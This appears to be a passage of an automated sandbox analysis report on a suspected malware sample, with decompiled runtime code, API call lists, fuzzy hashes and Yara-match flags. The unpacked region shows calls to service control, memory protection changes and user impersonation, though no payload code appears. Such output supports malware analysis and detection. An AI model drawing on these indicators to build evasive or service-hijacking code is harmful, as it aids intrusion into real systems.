                                                                        				if(_t35 != 0) {
                                                                        					_t25 = lstrlenA(_t35) + 1;
                                                                        					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
                                                                        					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
                                                                        					asm("sbb esi, esi");
                                                                        					_t30 =  ~_t12 + 1;
                                                                        					if(_t30 != 0) {
                                                                        						_t12 = GetLastError();
                                                                        						if(_t12 == 0x7a) {
                                                                        							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
                                                                        							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
                                                                        							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
                                                                        							asm("sbb esi, esi");
                                                                        							_t30 =  ~_t12 + 1;
                                                                        						}
                                                                        						if(_t30 != 0) {
                                                                        							_t12 = E00401030();
                                                                        						}
                                                                        					}
                                                                        					return _t12;
                                                                        				} else {
                                                                        					 *__ecx = _t35;
                                                                        					return __eax;
                                                                        				}
                                                                        			}











                                                                        0x004018f0
                                                                        0x004018f2
                                                                        0x004018f6
                                                                        0x004018fa
                                                                        0x00401917
                                                                        0x0040191a
                                                                        0x0040192f
                                                                        0x00401939
                                                                        0x0040193b
                                                                        0x0040193e
                                                                        0x00401940
                                                                        0x00401949
                                                                        0x0040195e
                                                                        0x0040196b
                                                                        0x00401980
                                                                        0x0040198a
                                                                        0x0040198c
                                                                        0x0040198c
                                                                        0x0040198f
                                                                        0x00401991
                                                                        0x00401991
                                                                        0x0040198f
                                                                        0x0040199a
                                                                        0x004018fc
                                                                        0x004018fc
                                                                        0x00401900
                                                                        0x00401900

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?), ref: 00401906
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                        • GetLastError.KERNEL32 ref: 00401940
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                        • String ID:
                                                                        • API String ID: 3322701435-0
                                                                        • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                        • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                        • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                        • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 169 40af66-40af6e 170 40af7d-40af88 call 40b84d 169->170 173 40af70-40af7b call 40d2e3 170->173 174 40af8a-40af8b 170->174 173->170 177 40af8c-40af98 173->177 178 40afb3-40afca call 40af49 call 40cd39 177->178 179 40af9a-40afb2 call 40aefc call 40d2bd 177->179 179->178
                                                                        C-Code - Quality: 63%
                                                                        			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                        				signed int _v4;
                                                                        				signed int _v16;
                                                                        				signed int _v40;
                                                                        				void* _t14;
                                                                        				signed int _t15;
                                                                        				intOrPtr* _t21;
                                                                        				signed int _t24;
                                                                        				void* _t28;
                                                                        				void* _t39;
                                                                        				void* _t40;
                                                                        				signed int _t42;
                                                                        				void* _t45;
                                                                        				void* _t47;
                                                                        				void* _t51;
                                                                        
                                                                        				_t40 = __edi;
                                                                        				_t28 = __ebx;
                                                                        				_t45 = _t51;
                                                                        				while(1) {
                                                                        					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
                                                                        					if(_t14 != 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t15 = E0040D2E3(_a4);
                                                                        					__eflags = _t15;
                                                                        					if(_t15 == 0) {
                                                                        						__eflags =  *0x423490 & 0x00000001;
                                                                        						if(( *0x423490 & 0x00000001) == 0) {
                                                                        							 *0x423490 =  *0x423490 | 0x00000001;
                                                                        							__eflags =  *0x423490;
                                                                        							E0040AEFC(0x423484);
                                                                        							E0040D2BD( *0x423490, 0x41a704);
                                                                        						}
                                                                        						E0040AF49( &_v16, 0x423484);
                                                                        						E0040CD39( &_v16, 0x420fa4);
                                                                        						asm("int3");
                                                                        						_t47 = _t45;
                                                                        						_push(_t47);
                                                                        						_push(0xc);
                                                                        						_push(0x420ff8);
                                                                        						_t19 = E0040E1D8(_t28, _t40, 0x423484);
                                                                        						_t42 = _v4;
                                                                        						__eflags = _t42;
                                                                        						if(_t42 != 0) {
                                                                        							__eflags =  *0x4250b0 - 3;
                                                                        							if( *0x4250b0 != 3) {
                                                                        								_push(_t42);
                                                                        								goto L16;
                                                                        							} else {
                                                                        								E0040D6E0(_t28, 4);
                                                                        								_v16 = _v16 & 0x00000000;
                                                                        								_t24 = E0040D713(_t42);
                                                                        								_v40 = _t24;
                                                                        								__eflags = _t24;
                                                                        								if(_t24 != 0) {
                                                                        									_push(_t42);
                                                                        									_push(_t24);
                                                                        									E0040D743();
                                                                        								}
                                                                        								_v16 = 0xfffffffe;
                                                                        								_t19 = E0040B70B();
                                                                        								__eflags = _v40;
                                                                        								if(_v40 == 0) {
                                                                        									_push(_v4);
                                                                        									L16:
                                                                        									__eflags = HeapFree( *0x4234b4, 0, ??);
                                                                        									if(__eflags == 0) {
                                                                        										_t21 = E0040BFC1(__eflags);
                                                                        										 *_t21 = E0040BF7F(GetLastError());
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						return E0040E21D(_t19);
                                                                        					} else {
                                                                        						continue;
                                                                        					}
                                                                        					L19:
                                                                        				}
                                                                        				return _t14;
                                                                        				goto L19;
                                                                        			}

















                                                                        0x0040af66
                                                                        0x0040af66
                                                                        0x0040af69
                                                                        0x0040af7d
                                                                        0x0040af80
                                                                        0x0040af88
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040af73
                                                                        0x0040af79
                                                                        0x0040af7b
                                                                        0x0040af8c
                                                                        0x0040af98
                                                                        0x0040af9a
                                                                        0x0040af9a
                                                                        0x0040afa3
                                                                        0x0040afad
                                                                        0x0040afb2
                                                                        0x0040afb7
                                                                        0x0040afc5
                                                                        0x0040afca
                                                                        0x0040afd0
                                                                        0x0040aec2
                                                                        0x0040b6b5
                                                                        0x0040b6b7
                                                                        0x0040b6bc
                                                                        0x0040b6c1
                                                                        0x0040b6c4
                                                                        0x0040b6c6
                                                                        0x0040b6c8
                                                                        0x0040b6cf
                                                                        0x0040b714
                                                                        0x00000000
                                                                        0x0040b6d1
                                                                        0x0040b6d3
                                                                        0x0040b6d9
                                                                        0x0040b6de
                                                                        0x0040b6e4
                                                                        0x0040b6e7
                                                                        0x0040b6e9
                                                                        0x0040b6eb
                                                                        0x0040b6ec
                                                                        0x0040b6ed
                                                                        0x0040b6f3
                                                                        0x0040b6f4
                                                                        0x0040b6fb
                                                                        0x0040b700
                                                                        0x0040b704
                                                                        0x0040b706
                                                                        0x0040b715
                                                                        0x0040b723
                                                                        0x0040b725
                                                                        0x0040b727
                                                                        0x0040b73a
                                                                        0x0040b73c
                                                                        0x0040b725
                                                                        0x0040b704
                                                                        0x0040b6cf
                                                                        0x0040b742
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040af7b
                                                                        0x0040af8b
                                                                        0x00000000

                                                                        APIs
                                                                        • _malloc.LIBCMT ref: 0040AF80
                                                                          • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                          • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                          • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                        • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 1411284514-0
                                                                        • Opcode ID: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                                                                        • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                        • Opcode Fuzzy Hash: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                                                                        • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 188 40e7ee-40e7f6 call 40e7c3 190 40e7fb-40e7ff ExitProcess 188->190
                                                                        C-Code - Quality: 100%
                                                                        			E0040E7EE(int _a4) {
                                                                        
                                                                        				E0040E7C3(_a4); // executed
                                                                        				ExitProcess(_a4);
                                                                        			}



                                                                        0x0040e7f6
                                                                        0x0040e7ff

                                                                        APIs
                                                                        • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                                                          • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                                          • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                                          • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                                                                        • ExitProcess.KERNEL32 ref: 0040E7FF
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                        • String ID:
                                                                        • API String ID: 2427264223-0
                                                                        • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                        • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
                                                                        • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                        • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 191 25299e8-2529a49 193 2529a82-2529ad2 OpenServiceA 191->193 194 2529a4b-2529a55 191->194 201 2529ad4-2529ada 193->201 202 2529adb-2529b0c 193->202 194->193 195 2529a57-2529a59 194->195 197 2529a5b-2529a65 195->197 198 2529a7c-2529a7f 195->198 199 2529a67 197->199 200 2529a69-2529a78 197->200 198->193 199->200 200->200 203 2529a7a 200->203 201->202 206 2529b0e-2529b12 202->206 207 2529b1c 202->207 203->198 206->207 208 2529b14 206->208 208->207
                                                                        APIs
                                                                        • OpenServiceA.ADVAPI32(?,?,?), ref: 02529AC2
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.293097174.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2520000_aPsf.jbxd
                                                                        Similarity
                                                                        • API ID: OpenService
                                                                        • String ID:
                                                                        • API String ID: 3098006287-0
                                                                        • Opcode ID: 45cca6a36ef9b97f301771ee34271135dfe44208d93eb123eb90b8dcd8f091b1
                                                                        • Instruction ID: 37ba06966945ec5e3685f56b97be62777c9c9745de30580449de677e8675eb89
                                                                        • Opcode Fuzzy Hash: 45cca6a36ef9b97f301771ee34271135dfe44208d93eb123eb90b8dcd8f091b1
                                                                        • Instruction Fuzzy Hash: 433143B1D002688FDB10CFA9C885BDEBBF5BB49304F248529E819AB380D7749849CF95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 209 2529920-252996f 211 2529971-2529974 209->211 212 2529977-252997b 209->212 211->212 213 2529983-25299b2 OpenSCManagerW 212->213 214 252997d-2529980 212->214 215 25299b4-25299ba 213->215 216 25299bb-25299cf 213->216 214->213 215->216
                                                                        APIs
                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 025299A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.293097174.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2520000_aPsf.jbxd
                                                                        Similarity
                                                                        • API ID: ManagerOpen
                                                                        • String ID:
                                                                        • API String ID: 1889721586-0
                                                                        • Opcode ID: 5f6705c7a8f91029b5458aa03f54e3f2e631e78ea98113007d43d0449632b31e
                                                                        • Instruction ID: 3670b54679fe86fe8b7bab13c4677faad45416d09aa4fa53f5d841fe6e94732b
                                                                        • Opcode Fuzzy Hash: 5f6705c7a8f91029b5458aa03f54e3f2e631e78ea98113007d43d0449632b31e
                                                                        • Instruction Fuzzy Hash: 5B2104B5D002199FCB10CF9AD984ADEFBF4FB89324F14815AD808BB384D7759944CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 218 2529180-2529201 VirtualProtect 221 2529203-2529209 218->221 222 252920a-252922f 218->222 221->222
                                                                        APIs
                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 025291F4
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.293097174.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2520000_aPsf.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 544645111-0
                                                                        • Opcode ID: 7952df642a019b444138781fad298f5d42bf5244a41a65e788cc324fffcda221
                                                                        • Instruction ID: 6847af994db5253456302bb6286e35550648d3560bb6d68bc93a0fd76e516bfe
                                                                        • Opcode Fuzzy Hash: 7952df642a019b444138781fad298f5d42bf5244a41a65e788cc324fffcda221
                                                                        • Instruction Fuzzy Hash: DC11F4B1D002599BDB10DFAAC984AEFFBF4FF58314F50842AD419A7240C7799944CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 226 2529350-25293bf FindCloseChangeNotification 229 25293c1-25293c7 226->229 230 25293c8-25293ed 226->230 229->230
                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE ref: 025293B2
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.293097174.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2520000_aPsf.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 6b3a16f1819b3e7c48d4d2ad3c7bbc3eda44bfaa68e7ced03d48010eff21e268
                                                                        • Instruction ID: 17c042ba7160379a5e6fa6329ab78b264e23fdead818b3d7bd86f6c9624d4395
                                                                        • Opcode Fuzzy Hash: 6b3a16f1819b3e7c48d4d2ad3c7bbc3eda44bfaa68e7ced03d48010eff21e268
                                                                        • Instruction Fuzzy Hash: 1A1128B1D002598BDB10DFAAC5447EEBBF4EF98314F208419D519A7380C779A944CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 239 2529ed8-2529f44 ImpersonateLoggedOnUser 241 2529f46-2529f4c 239->241 242 2529f4d-2529f6e 239->242 241->242
                                                                        APIs
                                                                        • ImpersonateLoggedOnUser.KERNELBASE ref: 02529F37
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.293097174.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2520000_aPsf.jbxd
                                                                        Similarity
                                                                        • API ID: ImpersonateLoggedUser
                                                                        • String ID:
                                                                        • API String ID: 2216092060-0
                                                                        • Opcode ID: 73574372a016623ac6b8050e3855ed32a7bf44495712f00a4da7b637b9dca009
                                                                        • Instruction ID: 82e900a92f4c4ff2de3d950214afd42e8e90bb058fb034bb5426bb00b429ac39
                                                                        • Opcode Fuzzy Hash: 73574372a016623ac6b8050e3855ed32a7bf44495712f00a4da7b637b9dca009
                                                                        • Instruction Fuzzy Hash: 4C1106B1900259CFDB10CF9AD944BDEBBF8EB58324F20845AD558A3780D378A945CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 234 2529cc8-2529d34 FindCloseChangeNotification 236 2529d36-2529d3c 234->236 237 2529d3d-2529d5e 234->237 236->237
                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE ref: 02529D27
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.293097174.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2520000_aPsf.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 26446bd910e21c220aef39721e0258155c77a42f01f74c24984f9fabfe6c9c6c
                                                                        • Instruction ID: 0854e1ebedb4f47d1d6b178644bc87b9d3c66826598c72c3df0f1b736f09f512
                                                                        • Opcode Fuzzy Hash: 26446bd910e21c220aef39721e0258155c77a42f01f74c24984f9fabfe6c9c6c
                                                                        • Instruction Fuzzy Hash: 201106B59002598FDB10CF9AD944BDEFBF8EB58324F20845AD558A3780D378A944CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 323 40d534-40d556 HeapCreate 324 40d558-40d559 323->324 325 40d55a-40d563 323->325
                                                                        C-Code - Quality: 100%
                                                                        			E0040D534(intOrPtr _a4) {
                                                                        				void* _t6;
                                                                        
                                                                        				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                        				 *0x4234b4 = _t6;
                                                                        				if(_t6 != 0) {
                                                                        					 *0x4250b0 = 1;
                                                                        					return 1;
                                                                        				} else {
                                                                        					return _t6;
                                                                        				}
                                                                        			}




                                                                        0x0040d549
                                                                        0x0040d54f
                                                                        0x0040d556
                                                                        0x0040d55d
                                                                        0x0040d563
                                                                        0x0040d559
                                                                        0x0040d559
                                                                        0x0040d559

                                                                        APIs
                                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateHeap
                                                                        • String ID:
                                                                        • API String ID: 10892065-0
                                                                        • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                        • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                        • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                        • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 326 40ea0a-40ea16 call 40e8de 328 40ea1b-40ea1f 326->328
                                                                        C-Code - Quality: 25%
                                                                        			E0040EA0A(intOrPtr _a4) {
                                                                        				void* __ebp;
                                                                        				void* _t2;
                                                                        				void* _t3;
                                                                        				void* _t4;
                                                                        				void* _t5;
                                                                        				void* _t8;
                                                                        
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(_a4);
                                                                        				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
                                                                        				return _t2;
                                                                        			}









                                                                        0x0040ea0f
                                                                        0x0040ea11
                                                                        0x0040ea13
                                                                        0x0040ea16
                                                                        0x0040ea1f

                                                                        APIs
                                                                        • _doexit.LIBCMT ref: 0040EA16
                                                                          • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                                                          • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                                                          • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                        • String ID:
                                                                        • API String ID: 1597249276-0
                                                                        • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                        • Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
                                                                        • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                        • Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292658701.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_84d000_aPsf.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9e104a1e4195cbc603625ce7445cff17741342c25fbea1322d8f3225652de673
                                                                        • Instruction ID: 5d3bd7544ca20318de6637aec213db6ea65be3fd9cd093fc760d4a82dbf66fce
                                                                        • Opcode Fuzzy Hash: 9e104a1e4195cbc603625ce7445cff17741342c25fbea1322d8f3225652de673
                                                                        • Instruction Fuzzy Hash: CC01F771404788AAE7108A16CC80B62BFD8FF51364F18C11AED059B242C2789C45C6B1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292658701.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_84d000_aPsf.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7eb92c8b4d5da2874c60461c078e870559386acf239d57516a7994de8bad3119
                                                                        • Instruction ID: 166feee001bf90d5139cc09c3fb089bfe0193d5d576b1d0e05a06f111e736fd6
                                                                        • Opcode Fuzzy Hash: 7eb92c8b4d5da2874c60461c078e870559386acf239d57516a7994de8bad3119
                                                                        • Instruction Fuzzy Hash: 7AF0C271404388AEE7108A16CC84B62FFDCEB51324F18C15AED585F686C3799C44CAB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                        				intOrPtr _v0;
                                                                        				void* _v804;
                                                                        				intOrPtr _v808;
                                                                        				intOrPtr _v812;
                                                                        				intOrPtr _t6;
                                                                        				intOrPtr _t11;
                                                                        				intOrPtr _t12;
                                                                        				intOrPtr _t13;
                                                                        				long _t17;
                                                                        				intOrPtr _t21;
                                                                        				intOrPtr _t22;
                                                                        				intOrPtr _t25;
                                                                        				intOrPtr _t26;
                                                                        				intOrPtr _t27;
                                                                        				intOrPtr* _t31;
                                                                        				void* _t34;
                                                                        
                                                                        				_t27 = __esi;
                                                                        				_t26 = __edi;
                                                                        				_t25 = __edx;
                                                                        				_t22 = __ecx;
                                                                        				_t21 = __ebx;
                                                                        				_t6 = __eax;
                                                                        				_t34 = _t22 -  *0x422234; // 0x5a9fcee
                                                                        				if(_t34 == 0) {
                                                                        					asm("repe ret");
                                                                        				}
                                                                        				 *0x423b98 = _t6;
                                                                        				 *0x423b94 = _t22;
                                                                        				 *0x423b90 = _t25;
                                                                        				 *0x423b8c = _t21;
                                                                        				 *0x423b88 = _t27;
                                                                        				 *0x423b84 = _t26;
                                                                        				 *0x423bb0 = ss;
                                                                        				 *0x423ba4 = cs;
                                                                        				 *0x423b80 = ds;
                                                                        				 *0x423b7c = es;
                                                                        				 *0x423b78 = fs;
                                                                        				 *0x423b74 = gs;
                                                                        				asm("pushfd");
                                                                        				_pop( *0x423ba8);
                                                                        				 *0x423b9c =  *_t31;
                                                                        				 *0x423ba0 = _v0;
                                                                        				 *0x423bac =  &_a4;
                                                                        				 *0x423ae8 = 0x10001;
                                                                        				_t11 =  *0x423ba0; // 0x0
                                                                        				 *0x423a9c = _t11;
                                                                        				 *0x423a90 = 0xc0000409;
                                                                        				 *0x423a94 = 1;
                                                                        				_t12 =  *0x422234; // 0x5a9fcee
                                                                        				_v812 = _t12;
                                                                        				_t13 =  *0x422238; // 0xfa560311
                                                                        				_v808 = _t13;
                                                                        				 *0x423ae0 = IsDebuggerPresent();
                                                                        				_push(1);
                                                                        				E004138FC(_t14);
                                                                        				SetUnhandledExceptionFilter(0);
                                                                        				_t17 = UnhandledExceptionFilter(0x41fb80);
                                                                        				if( *0x423ae0 == 0) {
                                                                        					_push(1);
                                                                        					E004138FC(_t17);
                                                                        				}
                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                        			}



















